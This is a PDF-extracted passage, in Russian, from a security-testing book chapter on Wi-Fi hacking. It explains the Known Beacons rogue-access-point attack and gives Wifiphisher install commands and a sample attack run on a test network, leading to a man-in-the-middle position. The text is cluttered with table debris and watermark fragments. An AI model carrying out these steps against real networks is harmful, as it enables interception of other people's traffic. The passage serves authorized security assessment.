|
p |
|
|
|
|
g |
|
|
|
|
|
|
|
|
|
|
|
|
e |
|
Рисунок 12.1 иллюстрирует атаку типа Known Beacons.
Жертва |
Атакующая |
|
точка доступа |
||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Несколько фреймов маяков |
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||
|
|
|
|
|
|
Правильно угаданный фрейм маяка |
|
|
|
|
|
|||||||||||
|
|
|
|
|
|
|
|
|
|
|
||||||||||||
|
|
|
|
|
|
|
|
|
||||||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
|
|
|
|
|
Зондирующий фрейм |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||
Если известная |
|
|
|
|
|
|
|
|
Ответна зондирующий фрейм |
|
|
|
|
|
|
|
||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
точка доступа |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
относится к типу |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Запрос открытой аутентификации |
|
|
|
|
|
|
|
|||||||||||
«Открытая» |
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||||
|
|
|
|
|
|
|
||||||||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||||
|
|
|
|
|
|
|
|
|
||||||||||||||
|
|
|
|
|
|
|
|
|||||||||||||||
|
|
|
|
Открытая аутентификация и подключение по 802.11 |
|
|
||||||||||||||||
|
|
|
|
|
|
Рис.12.1.Атака типа Known Beacons
AP атакующего начинает с передачи нескольких фреймов маяка, разновидности фрейма управления, который содержит всю сетевую информацию. Этот фрейм регулярно передается в эфир, чтобы сооб- щить устройствам о наличии сети. Если у жертвы есть информация об этой сети в списке предпочтительных сетей (поскольку жертва уже подключалась к этой сети в прошлом) и если AP злоумышленника и жертвы имеют тип Open, жертва отправит пробный запрос и под- ключится к нему.
Перед тем как выполнить эту атаку, нам необходимо настроить наши устройства. Некоторые устройства позволяют изменять флаг AutoConnect.Местоположениеэтогопараметраотличаетсяотустрой- ства к устройству, но обычно оно находится в настройках Wi-Fi, как показано на рис. 12.2, под настройкой наподобие Auto reconnect (Автоматическое повторное подключение).Убедитесь, что эта опция включена.
Затем настройте открытую точку доступа с именем my_essid. Мы сделали это с помощью портативной точки доступа TP-Link,но вы мо- жетеиспользоватьлюбоеустройствопосвоемувыбору.Посленастрой- ки подключите целевое устройство к сети my_essid. Затем установите
Wifiphisher (https://github.com/wifiphisher/wifiphisher/) – платформу мо-
шеннических AP,часто используемую для оценки безопасности сети:
Радиоканалы средней дальности: взлом Wi-Fi 339
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-xcha |
|
|
|
|
$ sudo apt-get install libnl-3-dev libnl-genl-3-dev libssl-dev $ git clone https://github.com/wifiphisher/wifiphisher.git
$ cd wifiphisher && sudo python3 setup.py install
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
Рис.12.2.Настройки Wi-Fi
с переключателем Auto reconnect
Wifiphisher должна быть нацелена на определенную сеть, чтобы начать атаковать клиентов этой сети. Мы создаем тестовую сеть,так- же называемую my_essid, чтобы избежать случайного воздействия на внешних клиентов, когда у нас нет на это разрешения:
# wifiphisher -nD –essid my_essid -kB
[*]Starting Wifiphisher 1.4GIT ( https://wifiphisher.org ) at 2019-08-19 03:35 [+] Timezone detected. Setting channel range to 1-13
[+] Selecting wfphshr-wlan0 interface for the deauthentication attack [+] Selecting wlan0 interface for creating the rogue Access Point [+] Changing wlan0 MAC addr (BSSID) to 00:00:00:yy:yy:yy
[+] Changing wlan0 MAC addr (BSSID) to 00:00:00:xx:xx:xx [+] Sending SIGKILL to wpa_supplicant
[*]Cleared leases, started DHCP, set up iptables
[+] Selecting OAuth Login Page template
Запускаем Wifiphisher в режиме Known Beacons, добавляя аргумент -kB . Вам не нужно предоставлять список слов для атаки,потому что у Wifiphisher он встроенный.Список слов содержитобщие ESSID,к ко- торому жертва могла подключиться в прошлом.После запуска коман- дыдолженоткрытьсяинтерфейсWifiPhisher,какпоказанонарис.12.3.
На панели Wifiphisher отображается количество подключенных це- левых устройств. В настоящее время наше тестовое устройство явля- ется единственным подключенным целевым устройством.
Посмотрите список предпочтительных сетей для устройства, ко- торое вы хотите «обмануть» в этом примере. Например, на рис. 12.4 представлен список предпочтительных сетей на устройстве Samsung Galaxy S8+.Обратите внимание,что в нем сохраненыдве сети; первая из них, FreeAirportWiFi, имеет легко угадываемое название.
340 Глава 12
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
Рис.12.3.Панель Wifiphisher показывает устройство жертвы,подключающееся к нашей сети
Рис.12.4.Предпочтительные сети целевого устройства
Разумеется,послетого как мы осуществим атаку,устройство долж- но отключиться от своей текущей сети и подключиться к вредонос- ной, поддельной сети (рис. 12.5).
Рис.12.5.Целевое устройство подключается к поддельной сети в результате атаки Known Beacons
С этого момента злоумышленник может работать как «человек по- середине», отслеживая трафик жертвы или даже вмешиваясь в него.
Радиоканалы средней дальности: взлом Wi-Fi 341